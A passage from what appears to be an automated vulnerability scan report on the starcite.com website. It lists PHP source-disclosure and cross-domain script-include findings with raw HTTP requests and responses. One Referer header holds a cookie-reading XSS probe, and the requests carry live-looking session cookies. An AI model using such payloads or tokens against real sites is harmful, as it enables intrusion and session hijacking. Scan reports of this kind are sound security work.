Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:21 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:50 GMT;path=/
Content-Length: 23419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.11. http://www2.starcite.com/starcite/whatwedo/overview

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/overview

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/whatwedo/overview HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:59:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:21:56 GMT;path=/
Content-Length: 24905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

3.12. http://www2.starcite.com/starcite/whatwedo/starcitenetwork

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www2.starcite.com
Path:   /starcite/whatwedo/starcitenetwork

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /starcite/whatwedo/starcitenetwork HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:24:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:24:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:46:51 GMT;path=/
Content-Length: 21350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...
<img src="http://<?php print $full_path?>themes/garland/images/spacer1.gif" width="1" height="13" />
...[SNIP]...

4. Cross-domain script include
There are 35 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


4.1. http://www2.starcite.com/starcite/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/ HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Set-Cookie: SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; expires=Tue, 25 Jan 2011 17:30:23 GMT; path=/; domain=.www2.starcite.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:03 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:30 GMT;path=/
Content-Length: 39548

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.2. http://www2.starcite.com/starcite/Solutionvideo/modules/meetings1to1/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/Solutionvideo/modules/meetings1to1/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /starcite/Solutionvideo/modules/meetings1to1/index.html HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:48 GMT
Server: Apache
Last-Modified: Mon, 26 Apr 2010 20:37:10 GMT
ETag: "1000000003200-dd5-48529bdc203b0"
Accept-Ranges: bytes
Content-Length: 3541
Keep-Alive: timeout=5, max=47
Connection: Keep-Alive
Content-Type: text/html
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:14 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Starcite
...[SNIP]...
<link rel="stylesheet" type="text/css" media="all" href="css/screen.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/swfobject/2.2/swfobject.js"></script>
...[SNIP]...

4.3. http://www2.starcite.com/starcite/customerlogin

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customerlogin

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/customerlogin HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:35 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 16140

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.4. http://www2.starcite.com/starcite/customers

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/customers

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/customers HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:12:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:12:10 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:34:41 GMT;path=/
Content-Length: 20570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.5. http://www2.starcite.com/starcite/destinationsolutions/finddestinations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/destinationsolutions/finddestinations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/destinationsolutions/finddestinations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:11:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:11:15 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=54
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:50 GMT;path=/
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.6. http://www2.starcite.com/starcite/home

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/home

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/home HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:31 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=45
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:32:59 GMT;path=/
Content-Length: 39445

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!--preload images
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.7. http://www2.starcite.com/starcite/jobs

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/jobs

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/jobs HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:51 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:23 GMT;path=/
Content-Length: 17352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.8. http://www2.starcite.com/starcite/locations

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/locations

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/locations HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:00 GMT;path=/
Content-Length: 18662

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.9. http://www2.starcite.com/starcite/misc/reset.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/misc/reset.css

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/misc/reset.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/resourcecenter/downloads/bridging-gap-mitigating-meetings-risk9154b%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E6a03df3b79
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmb=174720036.2.10.1293976610; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __unam=2392472-12d471e5d4f-40cdc366-1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 14:26:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:26:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:48:49 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.10. http://www2.starcite.com/starcite/modules/meetingsmeetings.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetingsmeetings.js

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/modules/meetingsmeetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:40 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
   <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.11. http://www2.starcite.com/starcite/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/news

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/news HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:14 GMT;path=/
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.12. http://www2.starcite.com/starcite/newsandevents

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /starcite/newsandevents HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 41113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...
</script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...

4.13. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Issue detail

The response dynamically includes the following script from another domain:

Request

